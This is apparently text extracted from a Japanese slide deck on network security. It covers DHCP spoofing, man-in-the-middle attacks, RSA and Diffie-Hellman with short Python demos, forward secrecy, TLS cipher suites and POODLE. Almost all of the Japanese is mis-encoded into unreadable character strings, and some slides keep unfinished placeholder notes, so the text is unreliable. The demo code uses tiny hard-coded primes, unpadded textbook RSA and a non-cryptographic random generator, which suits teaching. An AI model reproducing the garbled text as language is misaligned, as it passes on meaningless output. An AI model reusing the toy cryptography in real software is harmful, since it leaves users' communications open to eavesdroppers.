138. 8J'J Πϯλʔωοτ ઀ଓઌ ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢ Alice

139. 8J'J Πϯλʔωοτ ઀ଓઌ ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢ ֎ʹग़Δʹ͸ Ͳ͜ʹ௨৴Λ౤͛Ε͹ ྑ͍Ͱ͔͢ ͦΕ͸ DHCP DISCOVER

     ѱҙ͋Δୈࡾऀ ͬͪͩ͜Α DHCP OFFER Alice

140. 8J'J Πϯλʔωοτ ઀ଓઌ ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢ ѱҙ͋Δୈࡾऀ σʔλͷྲྀΕ ͜ͷΑ͏ͳ߈ܸ͸DHCPεϓʔϑΟϯάͱݺ͹ΕΔ Alice

141. ѱҙ͋Δୈࡾऀ͕ؒʹڬ·Δํ๏͸͍͔ͭ͋͘Δ͕ ઀ଓઌ͔Β͜͏ͨ͠ঢ়ଶΛະવʹ๷͙ज़͸ແ͍ͨΊ ΠϯλʔωοτΛհͨ͠௨৴͸ ؒʹѱҙ͋Δୈࡾऀ͕͍Δ΋ͷͱͯ͠ ௨৴Λߦ͏ඞཁ͕͋Δ

142. Πϯλʔωοτ͸఻ݴήʔϜͩ ԕ͘ͷϗετʹͨͲΓணͨ͘Ίʹ͸ ͨ͘͞ΜͷϗετΛܦ༝͢ΔՄೳੑ͕͋Δ ઀ଓઌ ܦ༝ͨ͠ϗετͷ਺Λhop਺ͱݺͿ 1hop 2hop 3hop 4hop 5hop

143. Πϯλʔωοτ͸఻ݴήʔϜͩ ௨৴ܦ࿏্ʹ͋Δશͯͷϗετʹ͸ ௨৴಺༰ؙ͕ݟ͑Ͱ͋Δ ઀ଓઌ

144. Πϯλʔωοτ͸఻ݴήʔϜͩ ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸ ࣍ͷϗετʹਖ਼͘͠௨৴಺༰Λ఻͑ͳ͍͔΋͠Εͳ͍ ઀ଓઌ

145. Πϯλʔωοτ͸఻ݴήʔϜͩ ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸ ຊདྷͷ௨৴૬खʹͳΓ͢·͔͢΋͠Εͳ͍ Bob Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢ Charlie Alice

146. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ ӨڹΛड͚ͳ͍ͨΊʹ͸ ௨৴಺༰Λ҉߸Խ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ

147. ڞ௨伴҉߸ H e l l o , sp W o

     r l d ! nl 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a m 8 can dc1 si vt n 9 n del : syn M f R + ed 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b H e l l o , sp W o r l d ! nl 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a 伴Λ࢖ͬͯม׵ 伴Λ࢖ͬͯٯม׵ ͲͷΑ͏ʹม׵͢Δ͔ʹҧ͍͕͋Δ
     ෳ਺ͷ҉߸ΞϧΰϦζϜ͕ଘࡏ͢Δ

148. ྑ͍ڞ௨伴҉߸ͱ͸ ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ શͯͷ伴Λࢼ͢ΑΓޮ཰ͷྑ͍ղಡํ๏͕ଘࡏ͠ͳ͍ ͜ΕΛূ໌͢Δͷ͕ࠔ೉ ͜Ε͸伴Λ௕͘͢Ε͹࣮ݱͰ͖Δ

149. ΞϧΰϦζϜ͕޿͘ར༻͞Ε͍ͯͯ
     ͦΕͰ΋ޮ཰ͷྑ͍ղಡํ๏͕ൃݟ͞Ε͍ͯͳ͍҉߸͸
     গͳ͘ͱ΋ࠓͷͱ͜Ζ͸҆શͰ͋Δͱߟ͑ΒΕΔ ҉߸ΞϧΰϦζϜΛࣗ࡞͢Δͱ ͜ͷ෦෼Λຬͨ͢ͷ͕ࠔ೉ʹͳΔ ∴҉߸ΞϧΰϦζϜͷࣗ࡞͸ΦεεϝͰ͖ͳ͍ ্هͷ৚݅Λຬͨ͢ طଘͷ҉߸ΞϧΰϦζϜΛ࠾༻͠Α͏

150. ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ ޿͘ར༻͞Ε͍ͯΔ͚Ͳ ޮ཰ͷྑ͍ղಡํ๏͕ݟ͔͍ͭͬͯͳ͍ڞ௨伴҉߸ Advanced Encryption Standard (AES) Blowfish ͳͲͳͲ ϒϩοΫ҉߸

     ετϦʔϜ҉߸ Chacha20

151. ڞ௨伴҉߸ͷ伴഑ૹ໰୊ ҉߸Λ΍ΓऔΓ͢ΔͨΊʹ͸伴͕ඞཁ ͔͠͠҉߸Խͱ෮߸ʹಉ͡伴Λ࢖͍ͬͯΔ৔߹ ౪ௌͷՄೳੑ͕͋Δ௨৴खஈΛ࢖ͬͯ૬खʹ伴Λ౉ͤͳ͍ ѱҙ͋Δୈࡾऀʹ伴͕όϨ͍ͯͨΒ ҉߸ͷҙຯ͕ͳ͍ Bob Alice

152. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ ӨڹΛड͚ͳ͍ͨΊʹ͸ ௨৴಺༰Λ҉߸Խ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗ NEW!

153. ެ։伴҉߸ ୭͔͕ެ։伴Λ౪ௌ͍ͯͨ͠ͱͯ͠΋
     ͦͷ伴Ͱ௨৴಺༰Λ෮߸͢Δ͜ͱ͸Ͱ͖ͳ͍ ෮߸͢Δͷʹඞཁͳ
     ൿີ伴
     ͸ଞਓʹڭ͑ͳ͍ ҉߸Խͱ෮߸ʹҟͳΔ伴Λ࢖͏҉߸ΞϧΰϦζϜ ҉߸Խʹඞཁͳ
     ެ։伴
     Λ௨৴૬खʹૹΔ

     ௨৴૬ख͸ެ։伴Λ࢖ͬͯ
     伴ͷओʹૹΓ͍ͨϝοηʔδΛ҉߸Խ͢Δ

154. ެ։伴҉߸ =15 =-15 =42 =57 42+15=57 57-15=42 ͜Μͳ҉߸ͩͱ
     ҰॠͰެ։伴͔Βൿີ伴͕όϨͯ͠·͏ ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
     

     ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍

155. RSA ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
     ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍ 373*61=22753Ͱ͋Δ͜ͱ͸؆୯ʹٻ·Δ͕ 22753͕373ͱ61ʹ෼ղͰ͖Δ͜ͱΛ ಉ͘͡Β͍؆୯ʹٻΊΔํ๏͸஌ΒΕ͍ͯͳ͍ ૉҼ਺෼ղ͕ඞཁ ͜ͷΑ͏ʹܭࢉྔ͕ରশͰͳ͍ܭࢉΛڬΜͰ伴Λ࡞Δ͜ͱͰ ެ։伴͔Βൿີ伴Λ࡞Ζ͏ͱ͢Δͱ ๲େͳܭࢉ͕ඞཁʹͳΔΑ͏ͳ伴Λ࡞ΕΔ

156. #!/usr/bin/env python3 # -*- coding: utf-8 -*- def egcd( x,

     y, a = 0, b = 1 ): div, mod = divmod( x, y ) if mod == 0: return ( y, a ) return egcd( y, mod, b - div * a, a ) def modinv( x, y ): a, b = egcd( x, y ) if a != 1: raise Exception( 'no modinv') return b % y def generate_key_pair(): prime_nums = [ 116903, 215443, 139721 ] public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ] private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) ) return ( public_key, private_key ) public_key, private_key = generate_key_pair(); print( 'ൿີ伴:\t%d' % private_key ) print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) ) plain = 0x686f6765 print( 'ݪจ:\t%X' % plain ) crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] ) print( '҉߸Խ:\t%X' % crypted ) decrypted = pow( crypted, private_key, public_key[ 0 ] ) print( '෮߸:\t%X' % decrypted ) $ ./crypto.py ൿີ伴: 15753325457 ެ։伴: 25185933029,139721 ݪจ: 686F6765 ҉߸Խ: 2779B8996 ෮߸: 686F6765 RSA

157. def egcd( x, y, a = 0, b = 1

     ): div, mod = divmod( x, y ) if mod == 0: return ( y, a ) return egcd( y, mod, b - div * a, a ) def modinv( x, y ): a, b = egcd( x, y ) if a != 1: raise Exception( 'no modinv') return b % y def generate_key_pair(): prime_nums = [ 116903, 215443, 139721 ] public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ] private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) ) return ( public_key, private_key ) public_key, private_key = generate_key_pair(); print( 'ൿີ伴:\t%d' % private_key ) print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) ) plain = 0x686f6765 print( 'ݪจ:\t%X' % plain ) crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] ) print( '҉߸Խ:\t%X' % crypted ) decrypted = pow( crypted, private_key, public_key[ 0 ] ) print( '෮߸:\t%X' % decrypted ) $ ./crypto.py ൿີ伴: 15753325457 ެ։伴: 25185933029,139721 ݪจ: 686F6765 ҉߸Խ: 2779B8996 ෮߸: 686F6765 RSA ͋Δ੔਺nͱૉͳ1Ҏ্nະຬͷ ࣗવ਺ͷ਺ΛٻΊΔؔ਺Λ ΦΠϥʔͷτʔγΣϯτؔ਺φ(n)ͱݺͿ ૉ਺ͷఆٛΑΓn͕ૉ਺ͷ৔߹φ(n)͸n-1ʹͳΔ φ(ab)=φ(a)φ(b)ʹͳΔ͜ͱ͕஌ΒΕ͍ͯΔ aͱbΛ஌͍ͬͯΔͱφ(ab)͸ఆ਺࣌ؒͰٻ·Δ͕ ab͔͠Θ͔Βͳ͍৔߹φ(ab)͸ࢦ਺࣌ؒΛཁ͢Δ ͜ͷඇରশੑΛ࢖ͬͯެ։伴͔Βൿີ伴ΛٻΊΔͷΛࠔ೉ʹ͢Δ

158. ެ։伴ΛૉҼ਺෼ղ͢Ε͹ൿີ伴ʹͨͲΓண͚Δ ༰қͰ͸ͳ͍͕ ૯౰ͨΓͰ伴Λ୳͢ΑΓ͸୹࣌ؒͰߦ͑ͯ͠·͏

159. ૉҼ਺෼ղ͸େ͖ͳ਺ʹͳΔఔܭࢉʹ͕͔͔࣌ؒΔ ݱ࣮తͳ࣌ؒͰܭࢉͰ͖ͳ͍Α͏ͳେ͖ͳ਺Λ伴ͱ͢Δ͜ͱͰ ൿີ伴͕όϨΔͷΛ๷͙ RSAͷ৔߹伴௕768bitҎԼͷ΋ͷ͸ ݱ࣮తͳ࣌ؒͰൿີ伴͕ٻ·ͬͯ͠·͏ࣄ͕஌ΒΕ͍ͯΔ ͜ͷΑ͏ͳݹ͍伴͸ΑΓ௕͍伴ʹߋ৽͠ͳ͚Ε͹ͳΒͳ͍ ެ։伴҉߸ͷ伴௕͸ૉҼ਺෼ղʹ͔͔Δ࣌ؒͰܾΊΔ

160. Bob Charlie தؒऀ߈ܸ ѱҙ͋Δୈࡾऀͱ҆શʹ௨৴Ͱ͖ΔΑ͏ʹͳͬͯ͠·ͬͨ! Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢ ௨৴૬ख͕ຊ෺Ͱ͋Δ͜ͱΛ͔֬Ίͳ͚Ε͹ͳΒ͍

161. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ ӨڹΛड͚ͳ͍ͨΊʹ͸ ௨৴಺༰Λ҉߸Խ ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗ NEW!

162. Bob ೝূہ BobຊਓͰ͋Δ͜ͱΛ ෺ཧతͳํ๏Ͱ֬ೝͯ͠ ൿີ伴Λൃߦ ެ։伴Λऔಘ αʔόূ໌ॻ ެ։伴Λ࢖ͬͯ҉߸Խͨ͠σʔλ͸ ຊ෺ͷBob͚͕ͩಡΊΔ ԿΒ͔ͷཧ༝ͰBobͷൿີ伴͕

     ଞਓͷखʹ౉ͬͯ͠·ͬͨ৔߹ ೝূہ͸ͦͷ伴Λࣦޮͤ͞Δ

163. Transport Layer Security ུͯ͠TLS ੲ͸SSLͱݺ͹Ε͍ͯͨ ͜ΕΒͷػೳΛ࣋ͬͨ௨৴࿏Λ࡞ΔͨΊͷن֨ RFCͰඪ४Խ[1]͞Ε͓ͯΓOpenSSLͳͲͷ࣮૷͕ଘࡏ͢Δ ࣌୅ͱͱ΋ʹ҆શͳ҉߸͸มΘΔͨΊTLS͸༷ʑͳ҉߸ٕज़Λαϙʔτ͍ͯ͠Δ [1] https://www.ietf.org/rfc/rfc5246.txt

     ௨৴಺༰Λ҉߸Խ ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗

164. Transport Layer Security ෺ཧ૚ σʔλϦϯΫ૚ TCP/IP ௨৴Λߦ͏ΞϓϦέʔγϣϯ TLS TLSΛ࢖͏ΞϓϦέʔγϣϯ͸ TLSʹ௨৴σʔλΛ౉͢

     TLS͸௨৴૬खͷ֬ೝɺ伴ڞ༗Λߦ͍ ҉߸Խͯ͠ϋογϡΛ͚ͭͨσʔλΛ TCP/IPͷιέοτʹྲྀ͢ TLSͷ্ʹΞϓϦέʔγϣϯΛ࡞ΔࣄͰ ҉߸ʹؔ͢Δ໘౗ࣄΛ ࣗ෼Ͱ࣮૷͢Δඞཁ͕ͳ͘ͳΔ

165. RSAΛ༻͍ͨTLS ެ։伴Λऔಘ nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴

     ༗ޮͳެ։伴Ͱ҉߸Խͨ͠஋Λ྆ऀͰڞ༗Ͱ͖ͨͱ͍͏͜ͱ͸ ڞ௨伴͸ҙਤͨ͠௨৴૬खͷΈͱڞ༗͞Εͨঢ়ଶʹ͋Δ ຊ෺ͷ௨৴૬ख͸ ൿີ伴Ͱ nΛऔΓग़ͤΔ Bob Alice

166. RSAΛ༻͍ͨTLS औಘ nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴

     ͜ͷ࣌ͷ௨৴Λه࿥͍ͯ͠Δୈࡾऀ͕͍ͨͱ͢Δ ͜ͷ࣌఺Ͱ͸ڞ௨伴҉߸ͷ伴΋ൿີ伴΋Θ͔Βͳ͍ͨΊ ୈࡾऀ͸௨৴ͷ಺༰Λ஌Δ͜ͱ͕Ͱ͖ͳ͍ Bob Alice

167. nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ

     ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β ڞ௨伴ΛऔΓग़ͯ͠ શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ

168. nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ

     nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ϑΥϫʔυηΩϡϦςΟ ௨৴͕ߦΘΕͨޙͰαʔόূ໌ॻͷൿີ伴͕όϨͯ΋ ͦΕ·ͰʹߦΘΕͨ௨৴಺༰͕όϨͳ͍Α͏ʹ͢Δ͜ͱ RSAͰڞ༗伴ͷૉΛ௨৴૬खʹૹΔͱ ϑΥϫʔυηΩϡϦςΟΛ࣮ݱͰ͖ͳ͍ ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β ڞ௨伴ΛऔΓग़ͯ͠ શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ

169. ཭ࢄର਺໰୊ G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a

     < p) ͜ͷΑ͏ͳࣜʹ͓͍ͯ xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕ xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ ಛʹp͕ڊେͳૉ਺ͷ৔߹ aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

170. Diffie-Hellman伴ڞ༗ G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a

     < p) ͜ͷΑ͏ͳࣜʹ͓͍ͯ xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕ xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ ͜ͷඇରশੑΛ࢖ͬͯ௨৴ܦ࿏্ʹݟ͑Δ৘ใ͚ͩͰ͸ ༰қʹ伴ΛٻΊΒΕͳ͍Α͏ʹ͢Δ ಛʹp͕ڊେͳૉ਺ͷ৔߹ aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

171. Diffie-Hellman伴ڞ༗ ͋Δཚ਺aΛ࡞Δ ͋Δཚ਺bΛ࡞Δ Ga = xa mod p Gb =

     xb mod p n = Gba mod p n = Gab mod p n͸ͲͪΒͷܭࢉํ๏Ͱ΋ ಉ͡஋ʹͳΔ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ͜͜Ͱަ׵͞ΕΔGa Gb ͔Β aͱbΛ஌Δࣄ͸Ͱ͖ͳ͍

172. #!/usr/bin/env python3 # -*- coding: utf-8 -*- import random random.seed()

     # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ p=152219 # ೚ҙͷૉ਺ x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺ # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍ secret1=random.randint(2,p) secret2=random.randint(2,p) print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 ) print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 ) # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ public1=pow( x, secret1, p ) public2=pow( x, secret2, p ) print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 ) print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 ) # ͜ͷ஋͕Ұக͢Δ key1=pow( public2, secret1, p ) key2=pow( public1, secret2, p ) print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 ) print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 ) Diffie-Hellman伴ڞ༗ $ ./dh.py Alice͕࡞ͬͨൿີͷ஋: 118909 Bob͕࡞ͬͨൿີͷ஋: 89005 Alice͔ΒBobʹૹΔ஋: 26981 Bob͔ΒAliceʹૹΔ஋: 123319 Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243 Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243

173. #!/usr/bin/env python3 # -*- coding: utf-8 -*- import random random.seed()

     # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ p=152219 # ೚ҙͷૉ਺ x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺ # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍ secret1=random.randint(2,p) secret2=random.randint(2,p) print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 ) print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 ) # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ public1=pow( x, secret1, p ) public2=pow( x, secret2, p ) print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 ) print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 ) # ͜ͷ஋͕Ұக͢Δ key1=pow( public2, secret1, p ) key2=pow( public1, secret2, p ) print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 ) print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 ) Diffie-Hellman伴ڞ༗ $ ./dh.py Alice͕࡞ͬͨൿີͷ஋: 118909 Bob͕࡞ͬͨൿີͷ஋: 89005 Alice͔ΒBobʹૹΔ஋: 26981 Bob͔ΒAliceʹૹΔ஋: 123319 Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243 Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243 7243ͱ͍͏஋Λڞ༗Ͱ͖ͨ ͜ͷ஋Λ΋ͱʹͯ͠ڞ௨伴҉߸ͷ伴Λ࡞Δ͜ͱ͕Ͱ͖Δ

174. Diffie-Hellman Ephemeral Ұ࣌త #!/usr/bin/env python3 # -*- coding: utf-8 -*-

     import random random.seed() # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ p=152219 # ೚ҙͷૉ਺ x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺ # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍ secret1=random.randint(2,p) secret2=random.randint(2,p) print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 ) print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 ) # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ public1=pow( x, secret1, p ) public2=pow( x, secret2, p ) print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 ) print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 ) # ͜ͷ஋͕Ұக͢Δ key1=pow( public2, secret1, p ) ͜ͷ஋Λ伴ڞ༗Λߦ͏౓ʹ มߋ͢Δ ͜ͷ஋͕ແ͍ͱ伴Λ ಛఆͰ͖ͳ͍͕ ͜ͷ஋ࣗମ͸౪ௌͰ͖ͳ͍ͨΊ ϑΥϫʔυηΩϡϦςΟ͕ಘΒΕΔ ൿີͷ஋͕ຖճมΘΔͷͰ૬ख͕ຊ෺͔Ͳ͏͔ͷ֬ೝ͕Ͱ͖ͳ͘ͳΔ ૬ख͕ຊ෺Ͱ͋Δ͜ͱͷ֬ೝ͸RSAΛ࢖ͬͯߦ͏

175. DHE-RSA-AES256-SHA256 TLS͕Diffie-Hellman伴ڞ༗Λ࢖͍ͬͯΔ͔Ͳ͏͔ TLSͷ҉߸εΠʔτ໊ΛݟΕ͹Θ͔Δ ڞ௨伴ͷڞ༗ʹ Diffie-Hellman Ephemeral Λ࢖͏ ௨৴૬ख͕ຊ෺Ͱ͋ΔࣄΛ RSAͰ͔֬ΊΔ 256bitͷAESΛ࢖ͬͯσʔλΛ҉߸Խ͢Δ

     σʔλͷվ͟ΜΛݕग़͢ΔͨΊʹڞ௨伴ͱσʔλͷ SHA-256ϋογϡΛ࢖͏

176. ପԁ཭ࢄର਺໰୊ ཭ࢄର਺໰୊͸ ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δͷʹ ࢦ਺࣌ؒΛཁ͢Δ໰୊Ͱ͋Δ ٯࢉͰ͖ͳ͍Θ͚Ͱ͸ͳ͍ͷͰ े෼େ͖ͳ஋Λ࢖ͬͯٯࢉʹ͕͔͔࣌ؒΔΑ͏ʹ͢Δඞཁ͕͋Δ ପԁ཭ࢄର਺໰୊͸ ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δํ๏͕஌ΒΕ͍ͯͳ͍ ٯࢉ͢Δํ๏͕ൃݟ͞Εͳ͍ݶΓ͸ ૯౰ͨΓ߈ܸʹ଱͑ΒΕΔఔ౓ͷେ͖͞ͷ஋Ͱྑ͍

177. ପԁۂઢDiffie-Hellman伴ڞ༗ ཭ࢄର਺໰୊ͷ୅ΘΓʹପԁ཭ࢄର਺໰୊Λ࢖͏ Diffie-Hellman伴ڞ༗ TLSʹ͓͍ͯ͸ Elliptic Curve Diffie-Hellman Ephemeral ུͯ͠ECDHEͱදه͞ΕΔ ݱ࣌఺Ͱ౪ௌऀʹݱ࣮తͳ࣌ؒͰ伴Λ஌ΒΕͳ͍ͨΊʹ

     RFC7525Ͱਪ঑͞Ε͍ͯΔ஋ͷେ͖͞ %J⒏F)FMMNBO伴ڞ༗ ପԁۂઢ%J⒏F)FMMNBO伴ڞ༗ CJU CJU https://tools.ietf.org/html/rfc7525

178. ͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋ ͓͍֮͑ͯͯཉ͍͠ࣄ ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠ ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏

179. TLS͸ྺ࢙͋ΔϓϩτίϧͳͷͰ ࠓ೔Ͱ͸҆શͱݴ͑ͳ͍҉߸ٕज़ʹ΋ରԠ͍ͯ͠Δ TLS͸઀ଓ࣌ʹαʔόͱΫϥΠΞϯτ͕࢖͑Δ҉߸ٕज़Λௐ΂ͯ ྆ऀ͕ରԠ͍ͯ͠Δ҉߸ٕज़Ͱ௨৴ΛࢼΈΔ ྫ͑͹ࠓ೔Ͱ͸ݱ࣮తͳ࣌ؒͰղಡͰ͖Δ512bitͷRSA΍RC4ʹ΋ରԠ͍ͯ͠Δ SSL 2.0 SSL 3.0 TLS

     1.0 TLS 1.1 TLS 1.2 TLS 1.3 com ing soon 1994೥ 1996೥ 1999೥ 2006೥ 2008೥

180. ಡΊΔ SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS

     1.2 TLS 1.3 com ing soon 1994೥ 1996೥ 1999೥ 2006೥ 2008೥ 2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ ݹ͍҉߸ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ ऑ͍҉߸ ऑ͍҉߸ Alice Bob ౪ௌऀ

181. POODLE(CVE-2014-3566) https://nvd.nist.gov/vuln/detail/CVE-2014-3566 2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ SSL 3.0ͷن্֨ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ ͜͜ʹ
     /*45ʹΑΔ100%-&ͷղઆΛషΔ

182. SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2

     TLS 1.3 com ing soon 1994೥ 1996೥ 1999೥ 2006೥ 2008೥ TLS 1.3Ͱ͸ࠓͰ͸҆શͰͳ͍҉߸ٕज़͕࠷ॳ͔Β࢖༻ෆೳʹͳΔ TLS1.3͕ҰൠతʹͳΔ·Ͱ͸ TLS 1.2͕࣋ͭػೳͷ͏ͪ ةݥͱ͞Ε͍ͯΔػೳΛ੾ͬͨঢ়ଶͰӡ༻ SSL 3.0ͷΑ͏ͳຊ౰ʹݹ͍҉߸͔͠ରԠ͍ͯ͠ͳ͍௨৴૬ख͸ ௨৴ΛఘΊͯ΋Β͏͔͠ͳ͍

183. RFC7525 Recommendations for Secure Use of Transport Layer Security (TLS)

     and Datagram Transport Layer Security (DTLS) TLS 1.2ͷػೳͷ͏ͪ ԿΛ੾͓ͬͯ͘΂͖͔͕ ·ͱΊΒΕ͍ͯΔ IUUQTUPPMTJFUGPSHIUNMSGD ඇެࣜͳ೔ຊޠ༁
     IUUQTTVNNFSXJOEKQEPDTSGD ͜͜ʹ
     3'$ͷ"CTUSBDUΛషΔ

